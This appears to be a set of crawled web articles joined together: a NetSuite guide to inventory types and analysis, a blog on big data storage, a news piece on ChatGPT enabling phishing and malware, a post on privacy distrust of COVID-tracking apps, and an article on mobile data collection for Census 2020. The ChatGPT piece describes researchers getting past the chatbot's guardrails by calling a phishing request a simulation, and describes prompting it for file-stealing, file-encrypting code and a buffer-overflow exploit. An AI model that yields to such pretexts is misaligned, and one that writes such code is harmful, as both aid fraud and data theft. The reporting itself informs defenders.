The verb “inventory” refers to the act of counting or listing items. As an accounting term, inventory is a current asset and refers to all stock in the various production stages. By keeping stock, both retailers and manufacturers can continue to sell or build items. Inventory is a major asset on the balance sheet for most companies, however, too much inventory can become a practical liability.
- Inventory, which describes any goods that are ready for purchase, directly affects an organisation’s financial health and prosperity.
- While there are many types of inventory, the four major ones are raw materials and components, work in progress, finished goods and maintenance, repair and operating supplies.
- While there are many ways to count and value your inventory, the importance lies in accurately tracking, analysing and managing it. Insights gained from inventory evaluations are necessary for success as they help companies make smarter and more cost-efficient business decisions.
An organisation’s inventory, which is often described as the step between manufacturing and order fulfilment, is central to all its business operations as it often serves as a primary source of revenue generation. Although inventory can be described and classified in numerous ways, it’s ultimately its management that directly affects an organisation’s order fulfilment capabilities.
For example, in keeping track of raw materials, safety stock, finished goods or even packing materials, businesses are collecting crucial data that influences their future purchasing and fulfilment operations. Understanding purchasing trends and the rates at which items sell determines how often companies need to restock inventory and which items are prioritised for re-purchase. Having this information on hand can improve customer relations, cash flow and profitability while also decreasing the amount of money lost to wasted inventory, stockouts and re-stocking delays.
13 Types of Inventory
There are four top-level inventory types: raw materials, work-in-progress (WIP), finished goods, and maintenance, repair and operating (MRO) supplies. These four main categories help businesses classify and track items that are in stock or that they might need in the future. However, they can be broken down further to help companies manage their inventory more accurately and efficiently.
Raw Materials: Raw materials are the materials a company uses to create and finish products. When the product is completed, the raw materials are typically unrecognisable from their original form, such as oil used to create shampoo.
Components: Components are like raw materials in that they are the materials a company uses to create and finish products, except that they remain recognisable when the product is completed, such as a screw.
Work In Progress (WIP): WIP inventory refers to items in production and includes raw materials or components, labour, overhead and even packing materials.
Finished Goods: Finished goods are items that are ready to sell.
Maintenance, Repair and Operations (MRO) Goods: MRO is inventory — often in the form of supplies — that supports making a product or the maintenance of a business.
Packing and Packaging Materials: There are three types of packing materials. Primary packing protects the product and makes it usable. Secondary packing is the packaging of the finished good and can include labels or SKU information. Tertiary packing is bulk packaging for transport.
Safety Stock and Anticipation Stock: Safety stock is the extra inventory a company buys and stores to cover unexpected events. Safety stock has carrying costs, but it supports customer satisfaction. Similarly, anticipation stock comprises raw materials or finished items that a business purchases based on sales and production trends. If a raw material’s price is rising or peak sales time is approaching, a business may purchase anticipation stock.
Decoupling Inventory: Decoupling inventory is the term used for extra items or WIP kept at each production line station to prevent work stoppages. Whereas all companies may have safety stock, decoupling inventory is useful if parts of the line work at different speeds and only applies to companies that manufacture goods.
Cycle Inventory: Companies order cycle inventory in lots to get the right amount of stock for the lowest storage cost.
Service Inventory: Service inventory is a management accounting concept that refers to how much service a business can provide in a given period. A hotel with 10 rooms, for example, has a service inventory of 70 one-night stays in each week.
Transit Inventory: Also known as pipeline inventory, transit inventory is stock that’s moving between the manufacturer, warehouses and distribution centres. Transit inventory may take weeks to move between facilities.
Theoretical Inventory: Also called book inventory, theoretical inventory is the least amount of stock a company needs to complete a process without waiting. Theoretical inventory is used mostly in production and the food industry. It’s measured using the actual versus theoretical formula.
Excess Inventory: Also known as obsolete inventory, excess inventory is unsold or unused goods or raw materials that a company doesn’t expect to use or sell but must still pay to store.
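The service inventory idea above is just capacity arithmetic, and can be sketched in a few lines. The function name and figures below are illustrative, not from any particular system; they reproduce the hotel and café numbers used in this article.

```python
def service_inventory(units, periods_per_window):
    """Total service capacity in a time window, e.g. rooms x nights
    or tables x seatings."""
    return units * periods_per_window

# A hotel with 10 rooms over a 7-night week:
hotel_stays = service_inventory(10, 7)   # 70 one-night stays per week

# A cafe with 10 tables, open 12 hours, one-hour average meal:
cafe_meals = service_inventory(10, 12)   # 120 meals per day
```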
Inventory is a company’s sellable goods and products, recorded as a current asset on its balance sheet, and it serves as the intermediary between manufacturing and order fulfilment.
Real-world examples can make inventory models easier to understand. The following examples demonstrate how the different types of inventory work in retail and manufacturing businesses.
Raw Materials/Components: A company that makes T-shirts has components that include fabric, thread, dyes and print designs.
Finished Goods: A jewelry manufacturer makes charm necklaces. Staff attaches a necklace to a preprinted card and slips it into cellophane envelopes to create a finished good ready for sale. The cost of goods sold (COGS) of the finished good includes both its packaging and the labour exerted to make the item.
Work In Progress: A cell phone consists of a case, a printed circuit board, and components. The process of assembling the pieces at a dedicated workstation is WIP.
MRO Goods: Maintenance, repair and operating supplies for a condominium community include copy paper, folders, printer toner, gloves, glass cleaner and brooms for sweeping up the grounds.
Packing Materials: At a seed company, the primary packing material is the sealed bag that contains, for example, flax seeds. Placing the flax seed bags into a box for transportation and storage is the secondary packing. Tertiary packing is the shrink wrap required to ship pallets of product cases.
Safety Stock: A veterinarian in an isolated community stocks up on disinfectant and dog and cat treats to meet customer demand in case the highway floods during spring thaw and delays delivery trucks.
Anticipated/Smoothing Inventory: An event planner buys discounted spools of ribbon and floral tablecloths in anticipation of the June wedding season.
Decoupled Inventory: In a bakery, the decorators keep a store of sugar roses with which to adorn wedding cakes – so even when the ornament team’s supply of frosting mix is late, the decorators can keep working. Because the flowers are part of the cake’s design, if the baker ran out of them, they couldn’t deliver a finished cake.
Cycle Inventory: As a restaurant uses its last 500 paper napkins, the new refill order arrives. The napkins fit easily in the dedicated storage space.
Service Inventory: A café is open for 12 hours per day, with 10 tables at which diners spend an average of one hour eating a meal. Its service inventory, therefore, is 120 meals per day.
Theoretical Inventory Cost: A restaurant aims to spend 30% of its budget on food but discovers the actual spend is 34%. The “theoretical inventory” is the 4% of food that was lost or wasted.
Book Inventory: The theoretical inventory of stock in the inventory record or system, which may differ from the actual inventory when you perform a count.
Transit Inventory: An art store orders and pays for 40 tins of a popular pencil set. The tins are en route from the supplier and, therefore, in transit.
Excess Inventory: A shampoo company produces 50,000 special shampoo bottles that are branded for the summer Olympics, but it only sells 45,000 and the Olympics are over — no one wants to buy them, so they’re forced to discount or discard them.
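Book (theoretical) inventory only matters when it is reconciled against what is actually on the shelf. A minimal sketch of that reconciliation, with illustrative SKUs and quantities loosely based on the art-store example above:

```python
# Book inventory is what the records say; the physical count is what
# a stocktake actually finds. The difference is shrinkage (loss, theft,
# miscounts). All names and quantities here are illustrative.
book_inventory = {"pencil_set": 40, "sketch_pad": 120}
physical_count = {"pencil_set": 38, "sketch_pad": 120}

def shrinkage(book, counted):
    """Units recorded in the books but missing from the shelf."""
    return {sku: book[sku] - counted.get(sku, 0) for sku in book}

print(shrinkage(book_inventory, physical_count))
# {'pencil_set': 2, 'sketch_pad': 0}
```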
The Importance of Inventory Control
Inventory control helps companies buy the right amount of inventory at the right time. Also known as stock control, this process helps optimise inventory levels, reduces storage costs and prevents stockouts.
Inventory control enables a company to earn the maximum profit from the least investment in stock without affecting customer satisfaction. It prevents exorbitant costs from over-purchasing or buying inessential inventory, prioritising instead the stock the business actually needs. With the appropriate internal and production controls, the practice ensures the company can meet customer demand and delivers financial flexibility. Done right, it also allows companies to accurately assess their current assets, account balances and financial reports.
Inventory Best Practices
The business saying “if you can’t measure it, you can’t manage it” applies to inventory management and best practices. While the first best practice is keeping track of your inventory, others include:
Carry Safety Stock: Also known as buffer stock, these products help keep companies from running out of materials or high-demand items. Once companies deplete their calculated supply, safety stock serves as a backup should demand increase unexpectedly.

Invest in a Cloud-Based Inventory Management Program: Cloud-based inventory management systems let companies know in real time where every product and SKU are located globally. This data helps an organisation be more responsive and up to date.

Start a Cycle Count Program: Cycle counting benefits extend well past the warehouse by keeping stock reconciled and customers happy, while also saving businesses time and money.

Use Batch/Lot Tracking: Record information associated with each batch or lot of a product. While some businesses log precise details, such as expiration dates that indicate their products’ sellable dates, companies that do not have perishable goods use batch/lot tracking to understand their products’ landed costs.
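Sizing the safety stock mentioned above is often done with a common rule of thumb: buffer against the worst-case gap between demand and lead time. This formula and all figures below are assumptions for illustration, not prescribed by this article.

```python
def safety_stock(max_daily_sales, max_lead_days, avg_daily_sales, avg_lead_days):
    """Rule-of-thumb buffer: worst-case usage minus average usage."""
    return max_daily_sales * max_lead_days - avg_daily_sales * avg_lead_days

def reorder_point(avg_daily_sales, avg_lead_days, buffer):
    """Stock level at which to reorder: expected usage during lead time
    plus the safety-stock buffer."""
    return avg_daily_sales * avg_lead_days + buffer

buffer = safety_stock(60, 10, 40, 7)   # 600 - 280 = 320 units
rop = reorder_point(40, 7, buffer)     # 280 + 320 = 600 units
```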
Inventory management is critical in strengthening a company’s supply chain because it helps balance the dynamics between customer demand, storage space and cash constraints.
What Is Inventory Turnover?
Inventory turnover is the number of times a company sells or uses an item in a specific timeframe, which can reveal whether a company has too much inventory on hand. To determine inventory turnover, use the following equations:
Average inventory = (Beginning Inventory + Ending Inventory) / 2
Inventory turnover = Sales / Average Inventory
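As a quick sketch, turnover divides sales over the period by average inventory; all figures below are illustrative.

```python
def average_inventory(beginning, ending):
    """Average inventory over a period."""
    return (beginning + ending) / 2

def inventory_turnover(sales, avg_inventory):
    """How many times inventory turned over in the period."""
    return sales / avg_inventory

avg = average_inventory(50_000, 30_000)    # 40,000.0
turns = inventory_turnover(200_000, avg)   # 5.0 turns in the period
```

A high turnover suggests stock is moving well; a low one can signal excess inventory tying up cash.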
What Is Inventory Analysis?
Inventory analysis is the study of how product demand changes over time and it helps businesses stock the right amount of goods and project how much customers will want in the future.
A well-known method for performing inventory analysis is ABC analysis. To perform an ABC analysis, group goods into three categories:
A inventory: A inventory includes the best-selling products that require the least space and cost to store. Many experts say this represents about 20% of your inventory.
B inventory: B items move at a similar rate to A items but cost more to store. Generally, this represents about 40% of your inventory.
C inventory: The remainder of your stock costs the most to store and returns the lowest profits. C inventory represents the other 40% of your inventory.
ABC analysis leverages the Pareto, or 80/20, principle and should reveal the 20% of your inventory that garners 80% of your profits. A company will want to focus on these items to increase sales and net profit margins. Inventory analysis may influence the choice of inventory control methods, whether just-in-time or just-in-case.
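A minimal ABC classification can be sketched by ranking SKUs by revenue and applying the 20%/40%/40% item-count split described above. The SKU names and revenue figures are illustrative assumptions.

```python
def abc_classify(revenue_by_sku):
    """Assign each SKU to class A, B or C by revenue rank,
    using a 20%/40%/40% split of the item count."""
    ranked = sorted(revenue_by_sku, key=revenue_by_sku.get, reverse=True)
    n = len(ranked)
    a_cut = max(1, round(n * 0.2))            # top 20% of items -> A
    b_cut = a_cut + max(1, round(n * 0.4))    # next 40% of items -> B
    return {
        sku: ("A" if i < a_cut else "B" if i < b_cut else "C")
        for i, sku in enumerate(ranked)
    }

revenue = {"s1": 900, "s2": 500, "s3": 120, "s4": 80, "s5": 40}
classes = abc_classify(revenue)
# s1 -> A; s2, s3 -> B; s4, s5 -> C
```

Real-world ABC analyses often split on cumulative revenue share (e.g. the items covering the first 80% of revenue) rather than raw item counts; this sketch follows the article's simpler item-count framing.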
Benefits of Inventory Analysis
Inventory analysis raises profits by lowering costs and supporting turnover. It also:
Improves Cash Flow: Inventory analysis helps you identify and reorder items you sell often, so you don’t spend money on inventory that moves slowly.
Reduces Stockouts: When you understand which inventory customers want most, you can better anticipate demand and prevent stockouts.
Increases Customer Satisfaction: Analysing inventory offers insight into what and how customers purchase goods.
Reduces Wasted Inventory: Understanding what, when and how much people buy minimises the need to store obsolete products, as well as when products expire so you can have a strategy behind using them.
Reduces Project Delays: Learning about supplier lead times helps you understand when to reorder and how to avoid late shipments.
Improves Pricing From Suppliers and Vendors: Inventory analysis can lead you to order high volumes of products regularly rather than small volumes on a less reliable schedule. This regularity can put you in a stronger position to negotiate discounts with suppliers.
Expands Your Understanding of the Business: Reviewing inventory provides insights into your stock, customers and business.
NetSuite Software for Managing All Your Inventory Needs
Properly managing inventory can make or break a business. Having insight into your stock at any given moment is critical to success. Decision makers know they need the right tools in place to be able to manage their inventory effectively. NetSuite offers a suite of native tools for tracking inventory in multiple locations, determining reorder points and managing safety stock and cycle counts. Find the right balance between demand and supply across your entire organisation with the demand planning and distribution requirements planning features.
NetSuite provides cloud inventory management solutions that fit companies ranging from startups and small businesses to the Fortune 100. Learn more about how you can use NetSuite to help plan and manage inventory, reduce handling costs and increase cash flow.
What is manufacturing inventory?
In manufacturing, inventory consists of in-stock items, raw materials and the components used to make goods. Manufacturers closely track inventory levels to ensure there isn’t a shortage that could stop work.
Accounting divides manufacturing stock into raw materials, WIP and finished goods because each type of inventory bears a different cost. Raw materials typically cost less per unit than do finished items.
What does inventory mean in the service industry?
Every company has stock that supports its regular business. For service companies, this inventory is intangible. A law firm’s inventory, for example, includes its files, while paper on which to print legal documents is the firm’s MRO.
What is an inventory process?
An inventory process tracks inventory as companies receive, store, manage and withdraw or consume it as work in progress. Essentially, the inventory process is the lifecycle of goods and raw materials.
What are the four different inventory types?
There are four main types of inventory: raw materials/components, WIP, finished goods and MRO. However, some people recognise only three types of inventory, leaving out MRO. Understanding the different types of inventory is essential for making sound financial and production planning choices.
How is inventory controlled?
Inventory control — or stock control — is making sure that your business has the right supply of inventory to meet customer demand. This usually requires inventory management software and supply chain management (SCM) software that brings in data from purchases, shipping, warehousing, reorders, receiving, storage, loss prevention, and even customer satisfaction.
What is an inventory record?
An inventory record, or stock record, contains data about the items a company has in stock, such as the amount of inventory on hand, what’s been sold and reordered, what’s on order, the product’s value, and where it’s stored. It’s important to keep accurate inventory records to assist with inventory control and keep accurate balance sheets.
What is demand forecasting?
Demand forecasting is the practice of predicting customer demand by looking at past buying trends, such as promotions and seasonality. Accurately predicting demand provides a better understanding of how much inventory you’ll need and reduces the need to store surplus stock.
Inventory forecasting relies on data to inform decisions, applying information and logic to guarantee you’ve got enough product on hand to meet demand while not tying up cash with unnecessary inventory. There are a number of advanced simulations used, but it typically comes in the form of trend forecasting, graphical forecasting, qualitative forecasting, or quantitative forecasting.
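As a concrete illustration of the quantitative forecasting mentioned above, here is a minimal moving-average forecast in Python. Real demand planning also models trend and seasonality; the monthly sales figures are invented for the example.

```python
# Simple moving-average demand forecast (illustrative data only).

def moving_average_forecast(history, window=3):
    """Forecast next period's demand as the mean of the last `window` periods."""
    if len(history) < window:
        raise ValueError("not enough history for the chosen window")
    return sum(history[-window:]) / window

monthly_sales = [120, 135, 128, 140, 152, 149]
print(moving_average_forecast(monthly_sales))   # (140 + 152 + 149) / 3 = 147.0
```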
What is average inventory cost?
The average cost of inventory is a method for calculating the per-unit cost of goods sold. To calculate the average cost, take the sum of the cost of all stock available for sale and divide it by the total number of units available for sale.
This method is also called weighted average cost, and is a valuable way to determine the value of your current inventory. It works best for brands that have high volumes of inventory and SKUs that are similar in cost. One of its benefits over other methods is that it makes it easier to track and consistently calculate inventory value by using a blended average.
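The blended average described above can be shown with a short worked example; the purchase lots below are invented for the illustration.

```python
# Weighted average cost: total cost of stock available for sale divided by
# total units available (illustrative purchase lots).

def weighted_average_cost(lots):
    """lots: iterable of (units, unit_cost) purchases."""
    total_units = sum(units for units, _ in lots)
    total_cost = sum(units * cost for units, cost in lots)
    return total_cost / total_units

# 100 units bought at $10.00 and 50 units bought at $13.00:
print(weighted_average_cost([(100, 10.0), (50, 13.0)]))   # 1650 / 150 = 11.0
```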
What is inventory count?
An inventory count is the physical act of counting the items in storage or a warehouse and checking their condition. For accounting purposes, inventory counts help assess assets and debts.
Inventory counts help you understand which stock is moving well and inventory managers often use this information to forecast stock needs and manage budgets. | <urn:uuid:50f9a968-1e1c-4881-bca9-249e33780efd> | CC-MAIN-2024-38 | https://www.netsuite.com.au/portal/au/resource/articles/inventory-management/inventory.shtml | 2024-09-20T07:10:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652138.47/warc/CC-MAIN-20240920054402-20240920084402-00328.warc.gz | en | 0.94251 | 3,781 | 3.21875 | 3 |
March 16, 2016
Welcome to the internet, a digital zoo of anonymity, hopes, and dreams. It’s only here that reputations can be established or ruined at a rodent’s mercy. It’s a method so simple even a monkey could do it. Hence the persistent mailchimp. However, that doesn’t mean the internet is up for monkey business.
Since the inception of Commercial Internet Service Providers (ISPs) in the late 80s and early 90s, the internet has stimulated tremendous economic growth by establishing new markets. As a result, numerous pioneers have laid the foundation by interconnecting communities and cultures by creating social media platforms like Facebook, Instagram, and Twitter. These communal networks have allowed people across the globe to successfully interact, share, and enjoy experiences across the digital spectrum in real time.
These digital arenas have not only created the potential for big markets but also created new enterprises and concepts such as big data. However, with big data comes big responsibility and the even bigger business of big data storage.
How Did Big Data Get so Big?
The internet wasn’t always a big deal. In its beginning it was only used by researchers and those patient enough to learn the complex system. It wasn’t until the late 80s—when it was suggested that the U.S. government share information through “hypertext” on the newly developed World Wide Web—that size began to matter.
The British computer scientist Tim Berners-Lee accurately predicted information growth would “grow past a critical threshold” because of the influx of information. Needless to say, he was right.
In October 1997, Michael Cox and David Ellsworth, two NASA researchers, published a research paper entitled “Application controlled demand paging for out-of-core visualization.” The article explained the paradox of supercomputers creating massive data sets which hindered the “capacities of main memory, local disks and even remote disks.”
The scientists called the complication “big data,” a term which has grown in popularity in a short time. However, the idea is bigger than ever. Big data has not only revolutionized the internet, it also spurred innovation in the field of data storage.
How Is All This Big Data Stored?
The World Wide Web’s tremendous growth over the last two decades has led to a more data-driven world. Startups often serve millions of users simultaneously worldwide. This has led to increased demand for storage and a jolt of innovation.
Traditional Relational Database Management Systems (RDBMS), which were the standard in the internet’s early days, are now buckling under the ever-increasing demands of big data. Large organizations such as Google, Amazon, and the CIA have adopted new unstructured database frameworks such as NoSQL, which sacrifice consistency and organization for speed and agility.
Hadoop is another technology that has emerged from the bowels of big data. The Java-based open-source framework complements NoSQL distributed databases and allows for the creation of server-based software while mitigating cutbacks in performance. As these large enterprises grow even bigger, there will be increased demand for better technologies from tomorrow’s geniuses.
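To make the Hadoop paradigm concrete, here is a toy, in-process illustration of the map/reduce pattern it popularized: counting words across documents. This is plain Python, not the actual Hadoop API, and the documents are invented.

```python
# Toy map/reduce word count (not the Hadoop API).

from collections import defaultdict

def map_phase(doc):
    # map: emit a (word, 1) pair for every word in the document
    return [(word, 1) for word in doc.split()]

def reduce_phase(pairs):
    # reduce: sum the counts for each distinct word (the "key")
    counts = defaultdict(int)
    for word, n in pairs:
        counts[word] += n
    return dict(counts)

docs = ["big data big storage", "data driven world"]
pairs = [pair for doc in docs for pair in map_phase(doc)]
print(reduce_phase(pairs))   # {'big': 2, 'data': 2, 'storage': 1, 'driven': 1, 'world': 1}
```

In a real Hadoop cluster the map and reduce phases run in parallel across many machines, with the framework shuffling pairs by key between them.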
However, for now, companies and governments will utilize their data sets to maximize their marketing potential and open doors for opportunists.
Who Uses All of This Data?
With capitalism there are always opportunities and the business of big data is no different. A cluster of markets have been created which have enabled entrepreneurs to cash in big. As a result, big data is currently being analyzed and implemented in many industries of both the public and private sectors worldwide.
Numerous businesses currently utilize big data analytics to process real-time trends in their target markets. Companies can now segment their audience and mitigate costs by advertising only to those who have a genuine interest in their brand. Supply chain and logistics companies can now receive live traffic data, which prioritizes routes, increases customer satisfaction, and enhances brand reputation.
In addition, social media platforms are making it a lot easier for their users to get stuck in their digital networks. Big data analytics is assisting with the delivery of the latest and hottest trends/topics. Everything from Donald Trump to crashing squirrels are fair game. If it’s popular, it’s a pop-up. Unfortunately, this has made it only easier for the world to “keep up with the Kardashians.”
The science community has also benefited from big data storage technology. Data analysis tools have been created that have assisted with breakthroughs in social science, evolutionary and human genome research. Big data analytics allows for the processing of huge amounts of DNA data, which assists with investigating disease cures, patterns, and origins. Scientists may have even successfully unmasked the elusive street artist, Banksy, using large sets of geospatial data and mathematical techniques from criminology.
Even science fiction is becoming science fact thanks to big data. China made recent headlines with its newest approach to big data applications: an attempt to utilize large data sets for pre-crime analysis. The city of New York is utilizing data mining procedures in an effort to revolutionize crime prevention using pattern recognition within large data sets.
Its results are allowing crime analysts to decipher data and better assess community needs. Additionally, with the recent influx of police brutality cases, high volume storage for police body cam footage has become a critical bullet point for large police departments to consider in their budgets.
What Does The Future Hold For Big Data?
Big Data and the Internet of Things
Since its inception big data has created tremendous opportunities and developments for not only entrepreneurs but also policemen, scientists, and communists. Its applications will only continue to become paramount in the future of all industries as we become more seduced by the “internet of things (IoT).”
In fact, businesses are adopting IoT at a surprising rate: 55 percent of those surveyed were using it to collect marketplace and operations data, or planned to within the year.
This just goes to show how the sheer amount of connected devices is making life easier to collect data for businesses. Big data and the Internet of Things is simply the perfect match and businesses are noticing.
Pretty soon your fridge will be able to decide exactly how much milk you need to nourish your famished cats and how many eggs you should purchase every month to satisfy your midnight omelet cravings. These “smart” devices will all utilize big data science and storage in order to make the best impression on its always evolving captive audience. | <urn:uuid:c3f79aca-dbbe-4d05-8876-1508c2a3bc9a> | CC-MAIN-2024-38 | https://www.colocationamerica.com/blog/possibilities-of-big-data-storage | 2024-09-08T04:26:09Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650958.30/warc/CC-MAIN-20240908020844-20240908050844-00528.warc.gz | en | 0.951708 | 1,389 | 3.34375 | 3 |
New AI Bot Could Take Phishing, Malware to a Whole New Level
Experts Warn ChatGPT Could Usher in Phishing 3.0, Democratize Hacking Technology
Anything that can write software code can also write malware. While most threat actors take several hours and sometimes even days to write malicious code, the latest AI technology can do it in seconds. Even worse, it could open the door to rapid innovation for hackers with little or no technical skills or help them overcome language barriers to writing the perfect phishing email.
Those are some of the fears in the cybersecurity community about the latest viral sensation, ChatGPT, an AI-based chatbot developed by OpenAI that specializes in dialogue. Simply ask a question, and it can compose a poem, write a term paper for a high schooler or craft malware code for a hacker.
Since the cybercrime market for ransomware as a service is already organized to outsource malware development, tools such as ChatGPT could make the process even easier for criminals entering the market.
"I have no doubt that ChatGPT and other tools like this will democratize cybercrime," says Suleyman Ozarslan, security researcher and co-founder of Picus Security. "It's bad enough that ransomware code is already available for people to buy off the shelf on the dark web. Now virtually anyone can create it themselves."
In testing ChatGPT, Ozarslan instructed the bot to write a phishing email, and it spat out a perfect mail within seconds. "Misspellings and poor grammar are often tell-tale signs of phishing, especially when attackers are targeting people from another region. Conversational AI eliminates these mistakes, making it quicker to scale and harder to spot them," he says.
While the terms of service for ChatGPT prohibit individuals from using the software for nefarious purposes, Ozarslan prompted the bot to write the phishing email by telling it the code would be used for a simulated attack. The software warned that "phishing attacks can be used for malicious purposes and can cause harm to individuals and organizations," but the bot created a phishing email anyway.
Despite the guardrails preventing users from causing mischief, numerous researchers found a way to bypass those warnings. "It's like a 3D printer that will not print a gun but will happily print a barrel, magazine, grip and trigger together if you ask it to," Ozarslan says.
Another computer researcher impressed by the capabilities of ChatGPT, Brendan Dolan-Gavitt, assistant professor at New York University, asked the bot to solve an easy buffer overflow challenge. ChatGPT correctly identified the vulnerability and wrote code exploiting the flaw. Although it made a minor error in the number of characters in the input, the bot quickly corrected it after Dolan-Gavitt prompted it.
Ozarslan asked the AI to write a software code in Swift, to be able to find all Microsoft Office files from his MacBook and send them over HTTPS to his web server. He also wanted the tool to encrypt all Microsoft Office files and send the private key to him for decryption.
Despite that action being potentially more dangerous than the phishing mail, ChatGPT sent the sample code without any warnings.
New Age of Deepfakes and Phishing 3.0
Peter Cassidy, general secretary with the Anti-Phishing Working Group, tells Information Security Media Group that phishing attacks have become more focused. "We've gone from broken English attacks against the banks in the English-speaking countries to extremely focused ones in order to create a false scenario about the victim," he says.
Cassidy explains how ChatGPT could make it easier for cybercriminals to achieve their targets in record numbers and with accuracy. "You can now get it to create a greeting for a birthday or wishes for someone who got out of the hospital, and in whichever language you want," he adds.
"Threat actors are never computer scientists when the arrests are made. It's always some 14-year-old kid who taught himself how to build malware from scratch, based on what he saw online. Phishing requires determination," he adds.
But tools for coders are also tools for threat actors. In a recent blog post, Eyal Benishti, CEO at Ironscales, called ChatGPT a double-edged sword and warned of AI leading to Phishing 3.0.
Deepfake technology uses AI to create fabricated content, making it look like the real thing. It has the proper context, and it sounds and reads like a legitimate message. "Imagine a combined attack where the threat actor impersonates a CEO with an email to accounting to create a new vendor account to pay a fake invoice, followed up by a fake voicemail with the CEO's voice acknowledging the authenticity of this email," he says.
"It is only a matter of time before threat actors combine phishing and pretext methods to deliver compelling, coordinated and streamlined attacks."
Now that personal information is publicly accessible over social media and other places on the web, it has become easier to harvest, correlate and put into context using sophisticated models designed to look for opportunities to create highly targeted attacks.
Only a week after it was introduced, ChatGPT was banned from Stack Overflow, a Q&A forum for programmers. When many people posted answers from ChatGPT, presumably to farm points on the platform, Stack Overflow noticed "a high rate of incorrect answers, which typically look like they might be good," the moderators wrote.
A New Source for Malware Innovation?
In a tweet, OpenAI CEO Sam Altman agrees that cybersecurity is one of the principal risks of "dangerously strong AI."
And in a paper about OpenAI's code-writing model - Codex - the company researchers say that "the non-deterministic nature of systems like Codex could enable more advanced malware. While software diversity can sometimes aid defenders, it presents unique challenges for traditional malware detection and antivirus systems that rely on fingerprinting and signature-matching against previously sampled binaries."
Application security and model deployment strategies including rate-limiting access and abuse monitoring can manage this threat in the near term, "though that is far from certain," the report adds.
Although ChatGPT is scary good, it contains imperfections, and that gives defenders time to tighten the fences. "Attackers won't stand still, nor should the defenders. As AI makes it easier for attackers to scale, it's vital for companies to validate security against real-world attackers and be proactive against new threats like AI as they emerge, rather than waiting around to see how they will impact them in the future," says Ozarslan.
ChatGPT is built on the GPT-3 deep learning model, which was created by OpenAI in a partnership with Microsoft in 2019. Recently, Altman credited the Microsoft Azure cloud for providing the AI infrastructure that powers the GPT language models.
In November 2021, Microsoft launched the Azure OpenAI Service, giving Azure customers the ability to use OpenAI's machine-learning models, which were previously available by invitation only.
The partnership helps cement Microsoft's Azure cloud infrastructure as the platform of choice for the next generation of AI. | <urn:uuid:93e0f521-67b0-4d7b-8c9c-9468d6c26dd7> | CC-MAIN-2024-38 | https://www.databreachtoday.com/new-ai-bot-could-take-phishing-malware-to-whole-new-level-a-20709 | 2024-09-13T01:43:34Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00128.warc.gz | en | 0.948991 | 1,481 | 2.875 | 3 |
The Washington Post reports that a recent poll shows that 3 out of 5 Americans are unable or unwilling to use an infection-alerting app developed by Google and Apple. About 1 in 6 adults can’t use the app because they don’t own a smartphone—with the lowest ownership levels among those 65 and older. People with smartphones are evenly split between those willing and those unwilling to use such an app.
The primary concern among those not willing to use such an app comes from the distrust people have about the ability or willingness of those two tech companies to protect the privacy of their health data. This unwillingness to use such an app, particularly after seeing the impact that the virus is having on the economy, is disturbing to scientists who have said that 60% or more of the public would need to use such an app to be effective.
This distrust of tech companies is nothing new. In November, the Pew Research Center published the results of the survey that showed how Americans feel about online privacy. That study’s preliminary finding was that more than 60% of Americans think it’s impossible to go through daily life without being tracked by tech companies or the government.
To make that finding worse, almost 70% of adults think that tech companies will use their data in ways they are uncomfortable with. Nearly 80% believe that tech companies won’t publicly admit guilt if they are caught misusing people’s data. People don’t feel that data collected about them is secure, and 70% believe data is less secure now than it was five years ago.
Almost 80% of people are concerned about what social media sites and advertisers know about them. Probably the most damning result of the survey is that 80% of Americans feel that they have no control over how data is collected about them.
There is no mystery about why people are worried about the collection of personal data. There have been headlines for several years talking about how personal data has been misused. The Facebook/Cambridge Analytica data scandal showed a giant tech company selling personal data that was used to sway voters. The big cellular companies were caught selling customer location data several times, which lets whoever buys it understand where people travel throughout each day. Phone apps of all sorts report back location data, web browsing data, and shopping habits, and nobody seems to be able to tell us where that data is sold. Even the supposed privacy advocate Apple lets contractors listen to Siri recordings.
It’s not a surprise that, given the distrust of tech companies, it’s becoming common for politicians to react to privacy breaches. For example, a bill was introduced into the House last year that would authorize the Federal Trade Commission to fine tech companies as much as 4% of their gross revenues for privacy violations.
California recently enacted a new privacy law with strict requirements on web companies that mimic the regulations used in Europe. Web companies must provide California consumers the ability to opt out of having their personal information sold to others. Consumers must be given the option to have their data deleted from the site. Consumers must be provided the opportunity to view the data collected about them. Consumers also must be shown the identity of third parties that have purchased their data.
The unwillingness to use the COVID-tracking app is probably the societal signal that the hands-off approach we’ve had for regulating the Internet needs to come to an end. Most hands-off policies were developed twenty years ago when AOL was conquering the business world, and legislators didn’t want to tamp down on a nascent industry. The tech companies are among the biggest and richest companies in the world, and there is no reason not to regulate some of their worst practices. This won’t be an easy genie to put back in the bottle, but we have to try. | <urn:uuid:5d136c8e-999e-4621-83ca-c2c9c7f9f713> | CC-MAIN-2024-38 | https://circleid.com/posts/20200603-privacy-in-the-age-of-covid-19 | 2024-09-20T10:33:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00428.warc.gz | en | 0.971616 | 776 | 2.578125 | 3 |
The federal government is always trying to do more with less. And few federal agencies need to do more than the Census Bureau, which once a decade collects information on every person living in the country.
Recently, the government has been able to save time and reduce costs by using mobile devices and data. So it’s not surprising that the Census Bureau plans to make a historic change to the way data will be collected, stored and shared for Census 2020. Field workers and respondents will now have the option to trade in their pens and paper — instead recording information using mobile devices and online applications.
To evaluate the performance of mobile data collection, the Census Bureau launched tests in the greater Houston and Los Angeles metropolitan areas in late March.
The use of advanced technology to document information was originally under consideration for the 2010 Census, but traditional recording methods were still used due to logistical complications during the testing process. Similarly, the Census Bureau will analyze the results and execution of mobile data collection from these 2016 census tests to determine whether it will be the new standard.
The census is a critical component to reporting statistical and demographic information for our country, making it imperative that all sensitive data be collected accurately and stored safely.
What Does the Mobile Transition Mean?
The first enumeration took place in 1790 and every decade since then, the Census Bureau has relied heavily on using hard copies to document and save data. However, this antiquated method has become tedious and expensive, and the Census Bureau has taken note.
For the 2016 census tests, field workers have the ability to use mobile devices to record data, while respondents can share their information online, over the phone and, in rare cases, through paper questionnaires.
Oftentimes, the census is viewed as a key measurement of domestic growth. One of the greatest ways to show progress and advancement through this process is to change the way invaluable census data is recorded. As a result of technology used in the census, including geospatial information systems, there will be a reduced need for door-to-door census taking.
